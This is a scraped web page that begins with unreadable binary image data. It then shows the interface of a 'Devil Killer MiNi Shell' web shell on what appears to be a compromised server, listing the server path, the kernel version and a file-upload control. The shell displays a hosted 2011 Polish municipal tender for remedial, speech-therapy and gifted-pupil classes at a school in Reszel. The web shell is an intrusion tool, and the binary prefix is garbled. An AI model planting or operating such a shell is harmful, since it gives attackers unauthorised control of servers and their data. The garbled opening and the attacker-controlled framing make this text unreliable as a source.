JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/321183-N-2011.html

<p class="kh_header"><b>Reszel: Zakup usług edukacyjnych, obejmujących przeprowadzenie zajęć dydaktycznych i 
   opiekuńczo - wychowawczych w ramach Projektu systemowego: Raz dwa trzy, 
   potrafisz i Ty w związku z zawartą umową POKL.09.01.02-28-105/11-00 o 
   dofinansowanie projektu w ramach Programu Operacyjnego Kapitał Ludzki z 
   Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 321183 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Reszel , Rynek 24, 11-440 Reszel, woj. warmińsko-mazurskie, tel. (089) 755 00 31, faks (089) 7550031.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.reszel.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług edukacyjnych, obejmujących przeprowadzenie zajęć dydaktycznych i 
   opiekuńczo - wychowawczych w ramach Projektu systemowego: Raz dwa trzy, 
   potrafisz i Ty w związku z zawartą umową POKL.09.01.02-28-105/11-00 o 
   dofinansowanie projektu w ramach Programu Operacyjnego Kapitał Ludzki z 
   Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Zakup usług edukacyjnych, obejmujących    
    przeprowadzenie zajęć dydaktycznych i opiekuńczo - wychowawczych w ramach Projektu Raz dwa trzy, potrafisz i Ty w terminie od dnia podpisania umowy do 28 czerwca 2013r. w Szkole Podstawowej Nr 3 w Reszlu, ul. Konopnickiej 2. 
    1.Usługi edukacyjne będą realizowane w następujących specjalnościach podzielonych na części stanowiących  załącznik 1A do umowy: Wymagania dane do przetargu na zakup usług edukacyjnych projekt Raz, dwa, trzy potrafisz i Ty.
Lp.	Rodzaj zajęć	Kwalifikacje	Liczba nauczycieli	Ilość godzin (45min) w latach:	2011	2012	2013	
1.Część 1.
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożone dysleksją.	10 letni staż pracy pedagogicznej,
studia podyplomowe lub kurs w zakresie terapii pedagogicznej lub pedagogiki korekcyjno - kompensacyjnej.	 Nauczycieli 4. Godzin w latach  2011,2012,2013,
120 h	240h	120h	8 grup
2.Część 2
Gimnastyka korekcyjna dla uczniów z wadami postawy i obniżoną sprawnością fizyczną	10 letni staż pracy pedagogicznej,
studia podyplomowe lub kurs w zakresie pedagogiki korekcyjno - kompensacyjnej, nauczycieli	2. Godzin w latach  2011,2012,2013,
75h	150h	75h	5 grup
3.Część 3
Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy 10 letni staż pracy pedagogicznej, 5 letnie studia w zakresie logopedii lub studia podyplomowe w tym zakresie, nauczycieli 2. Godzin w latach  2011,2012,2013,
120h	240h	120h	8 grup
4.Część 4
Zajęcia rozwijające zainteresowania uczniów zdolnych ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych 10 letni staż pracy pedagogicznej, przygotowanie do pracy z dziećmi w młodszym wieku szkolnym	. Nauczycieli 1. Godzin w latach  2011,2012,2013,
30h	60h	30h	2 grupy

Część 1 zadania, opis.
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożone dysleksją.
a).Zajęcia korekcyjno - kompensacyjne z uczniami będą polegały na ćwiczeniu funkcji słuchowej, wzrokowej, orientacji przestrzennej i sprawności manualnej. Na zajęcia korekcyjno - kompensacyjne zakwalifikowanych zostanie 38 uczniów  6 grup- po 5 uczniów w każdej i 2 grupy po 4 osoby zgodnie z Rozporządzeniem MENiS z 7. I.2003 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach w pierwszym roku realizacji 2011, 2012,
b).5 grup - po 3 uczniów w każdej i 3 grupy po 2 osoby zgodnie z Rozporządzeniem MEN z 17. XI. 2010r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach w drugim roku realizacji 2012, 2013.
   Produkty: 1 godz. zajęć w tygodniu dla każdej z 8 grup, tj.30 godz. w roku, zaś 60godz w ciągu 2 lat - (docelowo 480h dla 8 grup), listy obecności na każdych zajęciach, dzienniki zajęć raz na kwartał.
   Efekt: Zmniejszenie specyficznych trudności w czytaniu i pisaniu u 18 chłopców i 20 dziewczynek, w tym także zagrożonych ryzykiem dysleksji, klas I - III z SP 3 w Gminie Reszel poprzez działania edukacyjno - profilaktyczne prowadzone w ramach projektu.
   Część 2 zadania, opis.
   Gimnastyka korekcyjna dla uczniów z wadami postawy i obniżoną sprawnością fizyczną.
a).Zajęcia te będą polegały na korygowaniu zdiagnozowanych wad postawy typu: skolioza, lordoza, płaskostopie, koślawość kolan oraz zwiększaniu wydolności i sprawności fizycznej. Do zajęć gimnastyki korekcyjnej zostanie zakwalifikowanych 72 uczniów  4 grupy po 15 osób i 1 grupa 12 osobowa w pierwszym roku realizacji 2011,2012 zgodnie z Zarządzeniem MEN z dnia 19. XI. 1996 r. w sprawie zasad organizowania przez szkoły i placówki publiczne gimnastyki korekcyjnej oraz nadobowiązkowych zajęć z wychowania fizycznego, 
b).39 uczniów w tym 4 grupy po 8 osób i 1 grupa 7 osobowa w drugim roku realizacji  2012,2013. 
    Produkty: 1 godz. zajęć w tygodniu dla każdej z 5 grup tj. 30 godz. w roku, zaś 60 godz. w  ciągu 2 lat - (docelowo 300h dla 5 grup), listy obecności na każdych zajęciach, dzienniki zajęć raz na kwartał.
    Efekt: Zmniejszenie wad postawy i podniesienie poziomu sprawności fizycznej u 32 chłopców i 40 dziewczynek klas I-III z SP 3 w Gminie Reszel poprzez działania edukacyjno-profilaktyczne prowadzone w ramach projektu.
    Część 3 zadania, opis.
    Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy.
a).Zajęcia logopedyczne z uczniami będą polegały na ćwiczeniu poprawnej pod względem artykulacyjnym i komunikatywnym wymowy. Na zajęcia logopedyczne zostanie zakwalifikowanych 32 uczniów  8 grup po 4 uczniów każda zgodnie z Rozporządzeniem MENiS z 7. I. 2003r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach w pierwszym roku realizacji 2011, 2012. 
b).25 uczniów w tym 7 grup po 3 uczniów i 1 grupa 4 uczniów zgodnie z     
   Rozporządzeniem MEN z 17. XI. 2010r.w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach w drugim roku realizacji 2012,2013.
 Produkty: 1godz. zajęć w tygodniu dla każdej z 8 grup, tj. 30 godz. w roku, zaś 60 godz.  w ciągu 2 lat ( docelowo 480h dla 8 grup), listy obecności na każdych zajęciach, dzienniki zajęć raz na kwartał.
   Efekt: Zmniejszenie specyficznych trudności u 20 chłopców i 12 dziewczynek klas I-III z SP 3 w Gminie Reszel, u których występują zaburzenia mowy, poprzez działania edukacyjno-profilaktyczne prowadzone w ramach projektu.
Część 4 zadania, opis.
   Zajęcia rozwijające zainteresowania uczniów zdolnych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych.
a).Zajęcia te będą polegały na rozwijaniu zdolności badawczych i zainteresowań   
    matematyczno - przyrodniczych. Do zajęć rozwijających zainteresowania uczniów zdolnych zostanie zakwalifikowanych 16 uczniów  2 grupy po 8 osób każda w pierwszym roku realizacji 2011, 2012.
b).10 uczniów w tym 2 grupy po 5 osób każda w drugim roku realizacji 2012,2013 zgodnie z Rozporządzeniem MEN z 17. XI. 2010r.w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach.
 Produkty: 1 godz. zajęć w tygodniu dla każdej z 2 grup, tj. 30 godz. w roku, zaś 60 godz. w ciągu 2 lat (docelowo 120h dla 2 grup), listy obecności na każdych zajęciach, dzienniki zajęć raz na kwartał.
Efekt: Przyrost wiedzy i umiejętności u 6 chłopców i 10 dziewczynek szczególnie uzdolnionych z klas I-III z SP 3 w Gminie Reszel z zakresu matematyczno - przyrodniczego, poprzez działania edukacyjno-profilaktyczne prowadzone w ramach projektu.
2.Usługi edukacyjne będą realizowane w szkole w dniach i godzinach ustalonych z dyrektorem szkoły. Plan zajęć dla grup i podział grup zostanie ustalony po   
 rozstrzygnięciu przetargu.
3.Wykonawcy zobowiązani będą świadczyć usługi edukacyjne według harmonogramów uzgodnionych i zatwierdzonych przez dyrektora szkoły wymienionych w dziale III  SIWZ.
Jeden nauczyciel posiadający kwalifikacje może realizować dwa rodzaje zajęć pod  warunkiem złożenia oferty na takie zajęcia.
Jeden nauczyciel posiadający kwalifikacje może pracować w dwóch grupach 
 dotyczących jednego rodzaju zajęć w przypadku mniejszej ilości ofert posiadających kwalifikacje wykonawców za wynagrodzeniem brutto liczonym jak dla każdej grupy oddzielnie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1). spełniają warunki wynikające z art. 22 ust. 1 ustawy:
a). posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli    
     ustawy nakładają obowiązek posiadania takich uprawnień,
b). posiadają niezbędną wiedzę i doświadczenie,
c). nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
2). wykażą się odpowiednim doświadczeniem zawodowym w ciągu dziesięciu lat,
3). w przypadku, gdy o udzielenie zamówienia ubiega się konsorcjum, wówczas wymaga   
    się, aby żaden z jego członków nie podlegał wykluczeniu z postępowania na podstawie    
    art. 24 ust 1 i 2 ustawy, a członkowie łącznie spełnili warunki określone w pkt. 1 - 2  
    niniejszego działu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać następujące kwalifikacje:
    wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, studia 
   podyplomowe, kursy zgodnie z opisem kwalifikacji podanym w załączniku 1A.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać następujące kwalifikacje:
    wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, studia 
   podyplomowe, kursy zgodnie z opisem kwalifikacji podanym w załączniku 1A.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W zakresie wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, należy przedłożyć:
1).Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art.  22 ust. 1 ustawy (załącznik nr 4 do SIWZ).
2).Dokument potwierdzający posiadane wykształcenie i kwalifikacje Wykonawcy 
    potwierdzony za zgodność z oryginałem przez Dyrektora zatrudniającego Wykonawcę.
3).CV Wykonawcy lub osób podanych w ofercie do wykonaniu zamówienia w konsorcjach podmiotach gospodarczych.Formularz ofertowy - według załącznika nr 2 do SIWZ.
Wyrażenie zgody na przetwarzanie danych osobowych - załącznik nr 7 do SIWZ.
Parafowany wzór umowy według załącznika nr 1</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1).Konieczność wprowadzenia zmian wyniknie z okoliczności obiektywnych, których nie można było przewidzieć w chwili zawarcia umowy, niezależnych od woli stron. 
2).Strony umowy uznają zasadność wprowadzenia zmian do umowy, gdy zmiany te nie wywołają  niekorzystnych skutków dla Zamawiającego i nie spowodują zmiany oferowanych warunków realizacji zamówienia będących podstawą oceny ofert.
3).Przesunięcia terminu realizacji przedmiotu umowy między latami przewidzianymi na ich wykonanie, jeśli stanie się to konieczne z przyczyn niezależnych od stron umowy (np.choroba wykonawcy, brak możliwości prowadzenia zajęć w danym obiekcie, zmiany harmonogramu zajęć dla grup, podziału grup, zalecenia Instytucji Pośredniczącej),
4).W przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.reszel.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Reszel
11 -  440 Reszel
ul. Rynek 24
Województwo: warmińsko - mazurskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2011 godzina 10:00, miejsce: Ofertę należy złożyć w sekretariacie lub przesłać na adres: Szkoła Podstawowa Nr 3 w Reszlu, ul. Konopnickiej 2..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowyRaz dwa trzy,potrafisz i Ty w związku z zawartą umową POKL.09.01.02-28-105,11-00 o dofinansowanie projektu w ramach Programu Operacyjnego Kapitał Ludzki z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup usług edukacyjnych, obejmujących przeprowadzenie zajęć dydaktycznych i opiekuńczo - wychowawczych w ramach Projektu Raz dwa trzy, potrafisz i Ty w terminie od dnia podpisania umowy do 28 czerwca 2013r. w Szkole Podstawowej Nr 3 w Reszlu, ul. Konopnickiej 2. 
1.Usługi edukacyjne będą realizowane w następujących specjalnościach podzielonych na części stanowiących  załącznik 1A do umowy: Wymagania dane do przetargu na zakup usług edukacyjnych projekt Raz, dwa, trzy potrafisz i Ty..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożone dysleksją. 10 letni staż pracy pedagogicznej, studia podyplomowe lub kurs w zakresie terapii pedagogicznej lub pedagogiki korekcyjno - kompensacyjnej. Nauczycieli 4. Godzin w latach  2011,2012, 2013, 120 h 240h	120h	8 grup
Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożone dysleksją.
a).Zajęcia korekcyjno - kompensacyjne z uczniami będą polegały na ćwiczeniu funkcji słuchowej, wzrokowej, orientacji przestrzennej i sprawności manualnej. Na zajęcia korekcyjno - kompensacyjne zakwalifikowanych zostanie 38 uczniów  6 grup- po 5 uczniów w każdej i 2 grupy po 4 osoby zgodnie z Rozporządzeniem MENiS z 7. I.2003 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach w pierwszym roku realizacji 2011, 2012,
b).5 grup - po 3 uczniów w każdej i 3 grupy po 2 osoby zgodnie z Rozporządzeniem MEN z 17. XI. 2010r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach w drugim roku realizacji 2012, 2013.
   Produkty: 1 godz. zajęć w tygodniu dla każdej z 8 grup, tj.30 godz. w roku, zaś 60godz w ciągu 2 lat - (docelowo 480h dla 8 grup), listy obecności na każdych zajęciach, dzienniki zajęć raz na kwartał.
 Efekt: Zmniejszenie specyficznych trudności w czytaniu i pisaniu u 18 chłopców i 20 dziewczynek, w tym także zagrożonych ryzykiem dysleksji, klas I - III z SP 3 w Gminie Reszel poprzez działania edukacyjno - profilaktyczne prowadzone w ramach projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.31.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup usług edukacyjnych, obejmujących przeprowadzenie zajęć dydaktycznych i opiekuńczo - wychowawczych w ramach Projektu Raz dwa trzy, potrafisz i Ty w terminie od dnia podpisania umowy do 28 czerwca 2013r. w Szkole Podstawowej Nr 3 w Reszlu, ul. Konopnickiej 2. 
1.Usługi edukacyjne będą realizowane w następujących specjalnościach podzielonych na części stanowiących  załącznik 1A do umowy: Wymagania dane do przetargu na zakup usług edukacyjnych projekt Raz, dwa, trzy potrafisz i Ty..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.Część 2
